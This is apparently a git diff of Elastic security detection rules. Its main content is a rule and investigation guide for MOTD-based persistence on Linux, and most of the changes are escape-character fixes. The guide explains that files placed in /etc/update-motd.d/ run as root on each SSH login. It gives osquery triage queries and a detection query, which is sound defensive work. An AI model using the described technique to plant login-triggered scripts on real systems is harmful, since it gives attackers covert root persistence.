If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not \nprocess.executable : (\"/usr/bin/dpkg\" or \"/usr/bin/dockerd\" or \"/bin/rpm\" or \"/kaniko/executor\") and not \nfile.extension : (\"swp\" or \"swx\")\n",
 "references": [
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json
index a3478f63e7c..73a93577a44 100644
--- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_6.json
@@ -18,7 +18,7 @@
 "file.path",
 "process.executable"
 ],
- "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : (\n dpkg or dockerd or rpm or executor or dnf\n) and not file.extension : (\"swp\" or \"swpx\")\n",
 "references": [
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json
index 2d7c9acb90d..7c75efa6a49 100644
--- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json
@@ -18,7 +18,7 @@
 "file.path",
 "process.executable"
 ],
- "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0.
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0.
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : (\n dpkg or dockerd or rpm or executor or dnf\n) and not file.extension : (\"swp\" or \"swpx\")\n",
 "references": [
 "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd"
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json
index d10ddf04e46..4f5c713e2f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json
index 56ea6f1e419..22c12897b65 100644
--- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
